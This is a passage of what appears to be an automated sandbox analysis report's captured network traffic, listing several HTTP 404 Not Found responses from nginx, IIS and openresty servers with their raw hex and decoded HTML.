padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:08:00 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:08:00 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:07:54 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:08:00 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:07:55 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:08:05 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:08:05 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:08:09 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:08:09 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:08:20 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 